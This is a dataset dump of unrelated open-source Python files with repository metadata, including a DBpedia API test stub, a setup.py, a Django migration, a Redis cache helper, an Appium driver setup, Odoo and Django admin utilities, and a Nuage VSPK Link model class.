if k > 0:
return len(set(nums) & set(n + k for n in nums))
elif k == 0:
return sum(v > 1 for v in collections.Counter(nums).values())
else:
return 0
| [
"[email protected]"
] | |
3b7afc565fc2ff0482cafb249736d156f6f05efc | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /test/test_ice_hockey_league.py | c6490a78cce2303eb5bfa685c644b362d39686a4 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,309 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import dbpedia
from dbpedia.models.ice_hockey_league import IceHockeyLeague # noqa: E501
from dbpedia.rest import ApiException
class TestIceHockeyLeague(unittest.TestCase):
"""IceHockeyLeague unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IceHockeyLeague
            include_optional is a boolean; when False only required
            params are included, when True both required and
            optional params are included """
# model = dbpedia.models.ice_hockey_league.IceHockeyLeague() # noqa: E501
if include_optional :
return IceHockeyLeague(
viaf_id = [
'0'
],
leader_function = [
None
],
art_patron = [
None
],
manager_season = [
None
],
secretary_general = [
None
],
number_of_locations = [
56
],
discipline = [
None
],
type = [
'0'
],
revenue = [
1.337
],
affiliation = [
None
],
season = [
None
],
id = '0',
nla_id = [
'0'
],
chairperson = [
None
],
region_served = [
None
],
superintendent = [
None
],
formation_date = [
'0'
],
number_of_employees = [
56
],
extinction_date = [
'0'
],
player_season = [
None
],
endowment = [
1.337
],
number_of_teams = [
56
],
slogan = [
'0'
],
regional_council = [
None
],
location_city = [
None
],
number_of_volunteers = [
56
],
ideology = [
None
],
description = [
'0'
],
membership = [
'0'
],
ceo = [
None
],
formation_year = [
'0'
],
junior_season = [
None
],
headquarter = [
None
],
extinction_year = [
'0'
],
child_organisation = [
None
],
honours = [
None
],
parent_organisation = [
None
],
organisation_member = [
None
],
number_of_staff = [
56
],
product = [
None
],
hometown = [
None
],
foundation_place = [
None
],
national_selection = [
None
],
current_season = [
'0'
],
label = [
'0'
],
legal_form = [
None
],
general_council = [
None
],
trustee = [
None
],
age = [
56
],
main_organ = [
None
]
)
else :
return IceHockeyLeague(
)
def testIceHockeyLeague(self):
"""Test IceHockeyLeague"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
ccd797d9bd113bf5dbade1cb215f77a6a5b3b320 | 9d40c348e256bd74455521a7a11d8a4ab5d0d9f0 | /setup.py | b88fc0a1a902044454101d52320b623ab903dd99 | [] | no_license | tianon/etest | acf5bd2f06cf9a5024353cfc8128c3e968b889c2 | 01f24e46caaa3c75c48c43e59a8c03da81e06e3b | refs/heads/master | 2021-01-17T20:11:43.244552 | 2015-05-03T15:10:06 | 2015-05-03T15:10:33 | 36,564,139 | 0 | 0 | null | 2015-05-30T15:38:31 | 2015-05-30T15:38:31 | null | UTF-8 | Python | false | false | 2,447 | py | # Copyright (C) 2014 by Alex Brandt <[email protected]>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
import os
from setuptools import setup, find_packages
from codecs import open
with open(os.path.join('etest', 'information.py'), 'r', encoding = 'utf-8') as fh:
exec(fh.read(), globals(), locals())
PARAMS = {}
PARAMS['name'] = NAME # flake8: noqa — provided by exec
PARAMS['version'] = VERSION # flake8: noqa — provided by exec
PARAMS['description'] = DESCRIPTION # flake8: noqa — provided by exec
with open('README.rst', 'r', encoding = 'utf-8') as fh:
PARAMS['long_description'] = fh.read()
PARAMS['url'] = URL # flake8: noqa — provided by exec
PARAMS['author'] = AUTHOR # flake8: noqa — provided by exec
PARAMS['author_email'] = AUTHOR_EMAIL # flake8: noqa — provided by exec
PARAMS['license'] = LICENSE # flake8: noqa — provided by exec
PARAMS['classifiers'] = [
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
'Topic :: Utilities',
]
PARAMS['keywords'] = [
'ebuild',
'test',
'gentoo',
'portage',
'emerge',
]
PARAMS['packages'] = find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
PARAMS['package_data'] = {
'etest.parsers': [ 'bash.p' ],
}
PARAMS['install_requires'] = [
'click',
'docker-py',
'ply',
]
PARAMS['test_suite'] = 'nose.collector'
PARAMS['tests_require'] = [
    'coverage',
'nose',
]
PARAMS['entry_points'] = {
'console_scripts': [
'etest = etest:etest',
],
}
PARAMS['data_files'] = [
('share/doc/{P[name]}-{P[version]}'.format(P = PARAMS), [
'README.rst',
]),
]
setup(**PARAMS)
| [
"[email protected]"
] | |
449664c6a652f208251835430b04392c9f31857d | 457d07994582657539a52d2fe8b7c24557ecc1fb | /service10/migrations/0003_auto_20190201_0630.py | 0bcec6dd58bbb0c6baf0b78d282f64a82370ca3c | [] | no_license | ohsehwan/django_admin_nanum | 952c91452697f1ee7718449ceceaf4e434c3da27 | 0478389d3a44592fd2ee6f025f2b4a66c1a2176e | refs/heads/master | 2022-12-23T01:18:58.124355 | 2019-06-21T07:42:49 | 2019-06-21T07:42:49 | 168,487,820 | 3 | 1 | null | 2022-12-08T01:02:50 | 2019-01-31T08:11:59 | JavaScript | UTF-8 | Python | false | false | 597 | py | # Generated by Django 2.1.5 on 2019-02-01 06:30
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('service10', '0002_mentor'),
]
operations = [
migrations.CreateModel(
name='article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('html', ckeditor.fields.RichTextField()),
],
),
migrations.DeleteModel(
name='mentor',
),
]
| [
"[email protected]"
] | |
55f57819c1d4758954960879bf878e26885de0ae | e992b76761d2cc95e55d8c21f78f9636b0f74aae | /caches/__init__.py | 1611d10b35c4da8ec7150bb0321420534a499a69 | [
"MIT"
] | permissive | Jaymon/caches | 7d61bed61ef8d3dc8a328ee037c14a4fc994e98f | 3e2aa5fcf51e8de80bea46eb117b73fb1f398e53 | refs/heads/master | 2023-07-20T23:13:55.461196 | 2023-07-12T20:33:49 | 2023-07-12T20:33:49 | 12,884,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import logging
from caches.compat import *
from caches.core import (
Cache,
DictCache,
SetCache,
SortedSetCache,
SentinelCache,
)
from .interface import get_interfaces, get_interface, set_interface
from .dsn import configure, configure_environ
from .decorators import cached
__version__ = '3.0.0'
logger = logging.getLogger(__name__)
def unsafe_clear(pattern):
"""Clear the keys matching pattern
    This uses scan to find keys matching pattern (e.g., foo*) and deletes them one
at a time
https://github.com/redis/redis/issues/2042
https://stackoverflow.com/a/4006575/5006
:param pattern: str, something like foo* or *bar*
:returns: int, how many keys were deleted
"""
count = 0
for connection_name, inter in get_interfaces().items():
# https://redis.io/commands/scan
# https://stackoverflow.com/a/34166690/5006
for key in inter.scan_iter(match=pattern, count=500):
inter.delete(String(key))
count += 1
return count
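# Illustrative usage of unsafe_clear (the key pattern "session:*" is hypothetical and
# not from the original module): caches.unsafe_clear("session:*") would scan every
# configured interface, delete each key starting with "session:", and return the
# number of keys removed.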
configure_environ()
| [
"[email protected]"
] | |
5edeb038cd1f87c8aac071184fd2fef2036abf0b | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/cs61a/untarred backup/122.py | 887a81dc01674a92d8b5e6f55aff075abf43e9b7 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,076 | py | def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
goal_letters = get_list(goal_word)
guess_letters = get_list(guess)
common = 0
for guess_letter in guess_letters:
if guess_letter in goal_letters:
common += 1
goal_letters = [letter for letter in goal_letters if letter != guess_letter]
return common
| [
"[email protected]"
] | |
cea269f71a06be2e88bab6c122be7e5ec8d08c22 | 8a6c1d9ff5f469774ca4651d46f212474b3435bf | /base/base_driver.py | 8d5ef05be8b058f89c05bfb1479b57f4c18c3888 | [] | no_license | yuanyue888666/test_jinkens_001 | 67a68378dc518e3033a4563f0530adeb530a8646 | b553d0348d967cdb6e25c7d1a46746b75f6d9512 | refs/heads/master | 2020-04-27T15:46:15.202764 | 2019-03-08T03:42:47 | 2019-03-08T03:42:47 | 174,459,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py |
from appium import webdriver
def init_driver():
"""
    Calling this function opens the corresponding application.
    :return: a webdriver.Remote instance connected to the Appium server
    """
    # Appium server startup parameters (desired capabilities)
    desired_caps = {}
    # Device information
    desired_caps['platformName'] = 'Android'
    desired_caps['platformVersion'] = '5.1'
    desired_caps['deviceName'] = '192.168.56.101:5555'
    # Application under test information
    desired_caps['appPackage'] = 'com.android.contacts'
    desired_caps['appActivity'] = '.activities.PeopleActivity'
    # Do not reset the app between sessions
    desired_caps['noReset'] = True
    # Create and return our driver object
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
| [
"[email protected]"
] | |
9808dd7f6cb3c4f34d801fa34e4fda3e2717b5d7 | a15b050e661c31880acc72465421f3ba4906ef06 | /0x06-python-classes/101-square.py | ffd6008dce8087b7476ce7b4b8aa8ac3e838cdf3 | [] | no_license | zacwoll/holbertonschool-higher_level_programming | 0c483195f50a55fe0bfae5cff03c0c86719d8063 | 9c7dda67dc5681fd96b90d6f05ee9748a37ed8b8 | refs/heads/master | 2022-12-22T04:54:13.815410 | 2020-09-25T16:03:41 | 2020-09-25T16:03:41 | 259,412,215 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | #!/usr/bin/python3
"""Represent a Square Object with a __repr__ toString"""
class Square:
"""A Square"""
def __init__(self, size=0, position=(0, 0)):
"""Init"""
self.__size = size
self.__position = position
def __repr__(self):
"""Square toString"""
to_str = ''
if self.__size == 0:
to_str += '\n'
else:
to_str += ('\n' * self.__position[1])
for i in range(self.__size):
to_str += (' ' * self.__position[0])
to_str += ('#' * self.__size + '\n')
return to_str[:-1]
@property
def size(self):
"""gets the value of size"""
return self.__size
@size.setter
def size(self, value):
"""sets the value of size"""
if type(value) != int:
raise TypeError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Area of Square"""
return self.__size ** 2
@property
def position(self):
"""gets the value of position"""
return self.__position
@position.setter
def position(self, value):
"""Sets the value of position"""
if type(value) != tuple or len(value) != 2 or \
not all(type(x) == int and x >= 0 for x in a):
raise TypeError('position must be a \
tuple of 2 positive integers')
self.__position = value
def my_print(self):
"""Print the square."""
if self.__size == 0:
print()
else:
print('\n' * self.__position[1], end='')
for i in range(self.__size):
print(' ' * self.__position[0], end='')
print('#' * self.__size)
| [
"[email protected]"
] | |
4c19051a43c291779e8c00d44bd6b787249af569 | 20b2d61c0959023cb51be92fafe54877aecb9887 | /pabi_utils/models/ir_attachment.py | 574f5bb0a1d036cefea059529c50c697e945ffb3 | [] | no_license | BTCTON/pb2_addons | 6841a23554054f859b0c4acafb4e91bd0c3a14e4 | a5bfd90c202cea894690c96d74a74fa96eb79468 | refs/heads/master | 2021-09-07T16:55:41.195667 | 2018-02-26T11:27:01 | 2018-02-26T11:27:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | # -*- coding: utf-8 -*-
import logging
import os
from openerp import models, fields, api
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
_inherit = 'ir.attachment'
@api.model
def name_search(self, name, args=None, operator='ilike', limit=80):
if self._context.get('domain_template_ids', False):
args += [('id', 'in', self._context['domain_template_ids'][0][2])]
return super(IrAttachment, self).name_search(name=name, args=args,
operator=operator,
limit=limit)
# @api.model
# def load_xlsx_template(self, addon, template_ids, file_dir):
# print addon
# print template_ids
# print file_dir
# for xml_id in template_ids:
# try:
# xmlid = '%s.%s' % (addon, xml_id)
# att = self.env.ref(xmlid)
# file_path = '%s/%s' % (file_dir, att.datas_fname)
# att.datas = open(file_path, 'rb').read().encode('base64')
# except ValueError, e:
# _logger.exception(e.message)
@api.model
def load_xlsx_template(self, att_ids, folder):
for att in self.browse(att_ids):
try:
file_dir = os.path.dirname(os.path.realpath(__file__))
                # Until a better solution is found, we get the addon dir by
                # stripping this module's own path; make sure that the calling
                # addon is in the same folder as this pabi_utils module
file_dir = file_dir.replace('/pabi_utils/models', '')
file_path = '%s/%s/%s' % (file_dir, folder, att.datas_fname)
att.datas = open(file_path, 'rb').read().encode('base64')
except ValueError, e:
_logger.exception(e.message)
| [
"[email protected]"
] | |
485e5433667081aaf4dc508002d827c07367437d | 6bc485e593a24354e8ec6ad1284809c5748b7995 | /workon/contrib/admin2/templatetags/workon_admin_forms.py | 5e50c0aa768171d3c1ca93e280ff13d4969dbcbe | [
"BSD-3-Clause"
] | permissive | dalou/django-workon | fba87b6951540d7f059c8fcb79cd556573f56907 | ef63c0a81c00ef560ed693e435cf3825f5170126 | refs/heads/master | 2021-01-20T11:09:49.314839 | 2018-12-29T16:56:08 | 2018-12-29T16:56:08 | 50,340,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | from django import template
from ..config import get_config
register = template.Library()
def get_form_size(fieldset):
default_label_class = get_config('form_size').split(':')
# Try fieldset definition at first
size_by_fieldset = get_fieldset_size(fieldset)
if size_by_fieldset:
return size_by_fieldset
# Fallback to model admin definition
ma_sizes = getattr(fieldset.model_admin, 'workon_admin_form_size', None)
if ma_sizes:
return ma_sizes.split(':')
# Use default values at last
return default_label_class
def get_fieldset_size(fieldset):
if fieldset and fieldset.classes and ':' in fieldset.classes:
for cls in fieldset.classes.split(' '):
if ':' in cls:
return cls.split(':')
@register.filter
def workon_admin_form_label_class(field, fieldset):
default_class = get_form_size(fieldset)[0]
if not hasattr(field, 'field'):
return default_class
label_class = field.field.widget.attrs.get('label_class')
if label_class:
return label_class
return default_class
@register.filter
def workon_admin_form_field_class(field, fieldset):
"""
Return classes for form-column
"""
css_classes = []
default_class = get_form_size(fieldset)[1]
css_classes.append('form-column')
if not hasattr(field.field, 'field'):
css_classes.append(default_class)
return ' '.join(css_classes)
widget_py_cls = field.field.field.widget.__class__.__name__
css_classes.append('widget-%s' % widget_py_cls)
if 'RawIdWidget' in widget_py_cls:
css_classes.append('form-inline')
class_by_widget = field.field.field.widget.attrs.get('column_class')
if class_by_widget:
del field.field.field.widget.attrs['column_class']
css_classes.append(class_by_widget)
else:
css_classes.append(default_class)
return ' '.join(css_classes)
| [
"[email protected]"
] | |
f95b3ee3fe611007015802c0361cebe21cdbccd6 | 2b398353f5b0529ac666ef180e9dc966474a70c0 | /vspk/v6/nulink.py | 7802d9c7190be35e9f30fde7416b604ce123d54f | [
"BSD-3-Clause"
] | permissive | nuagenetworks/vspk-python | e0c4570be81da2a4d8946299cb44eaf9559e0170 | 9a44d3015aa6424d0154c8c8a42297669cce11f9 | refs/heads/master | 2023-06-01T01:12:47.011489 | 2023-05-12T19:48:52 | 2023-05-12T19:48:52 | 53,171,411 | 21 | 18 | BSD-3-Clause | 2020-12-16T12:36:58 | 2016-03-04T23:10:58 | Python | UTF-8 | Python | false | false | 19,510 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUDemarcationServicesFetcher
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUNextHopsFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUPolicyStatementsFetcher
from .fetchers import NUCSNATPoolsFetcher
from .fetchers import NUPSNATPoolsFetcher
from .fetchers import NUOverlayAddressPoolsFetcher
from bambou import NURESTObject
class NULink(NURESTObject):
""" Represents a Link in the VSD
Notes:
Border router links provide a way to interconnect VNS domains in the wide-area to datacenter domains. Service chaining links allow domain leaking in order to simplify and enhance capabilities of doing service chaining and traffic steering for NFV and service-provider-grade VPN services.
"""
__rest_name__ = "link"
__resource_name__ = "links"
## Constants
CONST_ASSOCIATED_DESTINATION_TYPE_DOMAIN = "DOMAIN"
CONST_TYPE_BORDER_ROUTER = "BORDER_ROUTER"
CONST_TYPE_SERVICE_CHAINING = "SERVICE_CHAINING"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_TYPE_OVERLAY_ADDRESS_TRANSLATION = "OVERLAY_ADDRESS_TRANSLATION"
CONST_ACCEPTANCE_CRITERIA_SUBNETS_ONLY = "SUBNETS_ONLY"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
CONST_ACCEPTANCE_CRITERIA_ALL = "ALL"
CONST_TYPE_BIDIR = "BIDIR"
CONST_TYPE_HUB_AND_SPOKE = "HUB_AND_SPOKE"
def __init__(self, **kwargs):
""" Initializes a Link instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> link = NULink(id=u'xxxx-xxx-xxx-xxx', name=u'Link')
>>> link = NULink(data=my_dict)
"""
super(NULink, self).__init__()
# Read/Write Attributes
self._last_updated_by = None
self._last_updated_date = None
self._acceptance_criteria = None
self._read_only = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._associated_destination_id = None
self._associated_destination_name = None
self._associated_destination_type = None
self._associated_source_id = None
self._associated_source_name = None
self._associated_source_type = None
self._owner = None
self._external_id = None
self._type = None
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="acceptance_criteria", remote_name="acceptanceCriteria", attribute_type=str, is_required=False, is_unique=False, choices=[u'ALL', u'SUBNETS_ONLY'])
self.expose_attribute(local_name="read_only", remote_name="readOnly", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_id", remote_name="associatedDestinationID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_name", remote_name="associatedDestinationName", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_type", remote_name="associatedDestinationType", attribute_type=str, is_required=False, is_unique=False, choices=[u'DOMAIN'])
self.expose_attribute(local_name="associated_source_id", remote_name="associatedSourceID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_source_name", remote_name="associatedSourceName", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_source_type", remote_name="associatedSourceType", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
self.expose_attribute(local_name="type", remote_name="type", attribute_type=str, is_required=False, is_unique=False, choices=[u'BIDIR', u'BORDER_ROUTER', u'HUB_AND_SPOKE', u'OVERLAY_ADDRESS_TRANSLATION', u'SERVICE_CHAINING'])
# Fetchers
self.demarcation_services = NUDemarcationServicesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.next_hops = NUNextHopsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.policy_statements = NUPolicyStatementsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.csnat_pools = NUCSNATPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.psnat_pools = NUPSNATPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.overlay_address_pools = NUOverlayAddressPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def acceptance_criteria(self):
""" Get acceptance_criteria value.
Notes:
A route filtering criteria enum. Defaults to ALL.
This attribute is named `acceptanceCriteria` in VSD API.
"""
return self._acceptance_criteria
@acceptance_criteria.setter
def acceptance_criteria(self, value):
""" Set acceptance_criteria value.
Notes:
A route filtering criteria enum. Defaults to ALL.
This attribute is named `acceptanceCriteria` in VSD API.
"""
self._acceptance_criteria = value
@property
def read_only(self):
""" Get read_only value.
Notes:
This is set to true if a link has been created in the opposite direction
This attribute is named `readOnly` in VSD API.
"""
return self._read_only
@read_only.setter
def read_only(self, value):
""" Set read_only value.
Notes:
This is set to true if a link has been created in the opposite direction
This attribute is named `readOnly` in VSD API.
"""
self._read_only = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only up to the maximum number of Metadata objects configured in the system configuration is returned.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only up to the maximum number of Metadata objects configured in the system configuration is returned.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def associated_destination_id(self):
""" Get associated_destination_id value.
Notes:
This is the ID of the domain receiving the routes from the source. This can only be set for links of type OVERLAY_ADDRESS_TRANSLATION.
This attribute is named `associatedDestinationID` in VSD API.
"""
return self._associated_destination_id
@associated_destination_id.setter
def associated_destination_id(self, value):
""" Set associated_destination_id value.
Notes:
This is the ID of the domain receiving the routes from the source. This can only be set for links of type OVERLAY_ADDRESS_TRANSLATION.
This attribute is named `associatedDestinationID` in VSD API.
"""
self._associated_destination_id = value
@property
def associated_destination_name(self):
""" Get associated_destination_name value.
Notes:
None
This attribute is named `associatedDestinationName` in VSD API.
"""
return self._associated_destination_name
@associated_destination_name.setter
def associated_destination_name(self, value):
""" Set associated_destination_name value.
Notes:
None
This attribute is named `associatedDestinationName` in VSD API.
"""
self._associated_destination_name = value
@property
def associated_destination_type(self):
""" Get associated_destination_type value.
Notes:
Type of the associated destination entity.
This attribute is named `associatedDestinationType` in VSD API.
"""
return self._associated_destination_type
@associated_destination_type.setter
def associated_destination_type(self, value):
""" Set associated_destination_type value.
Notes:
Type of the associated destination entity.
This attribute is named `associatedDestinationType` in VSD API.
"""
self._associated_destination_type = value
@property
def associated_source_id(self):
""" Get associated_source_id value.
Notes:
The ID of the domain receiving the routes from another domain
This attribute is named `associatedSourceID` in VSD API.
"""
return self._associated_source_id
@associated_source_id.setter
def associated_source_id(self, value):
""" Set associated_source_id value.
Notes:
The ID of the domain receiving the routes from another domain
This attribute is named `associatedSourceID` in VSD API.
"""
self._associated_source_id = value
@property
def associated_source_name(self):
""" Get associated_source_name value.
Notes:
None
This attribute is named `associatedSourceName` in VSD API.
"""
return self._associated_source_name
@associated_source_name.setter
def associated_source_name(self, value):
""" Set associated_source_name value.
Notes:
None
This attribute is named `associatedSourceName` in VSD API.
"""
self._associated_source_name = value
@property
def associated_source_type(self):
""" Get associated_source_type value.
Notes:
This is the source object type for the associatedSourceID
This attribute is named `associatedSourceType` in VSD API.
"""
return self._associated_source_type
@associated_source_type.setter
def associated_source_type(self, value):
""" Set associated_source_type value.
Notes:
This is the source object type for the associatedSourceID
This attribute is named `associatedSourceType` in VSD API.
"""
self._associated_source_type = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
@property
def type(self):
""" Get type value.
Notes:
This is used to distinguish between different types of links: hub and spoke, IP address, VNS border router links.
"""
return self._type
@type.setter
def type(self, value):
""" Set type value.
Notes:
This is used to distinguish between different types of links: hub and spoke, IP address, VNS border router links.
"""
self._type = value
| [
"[email protected]"
] | |
e7fe710c9c2d6ebda3fbd6abeb440116a6fe2d4b | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.py | 4057d7a5c0281d83115c8389161a41dd451ce6df | [
"MIT"
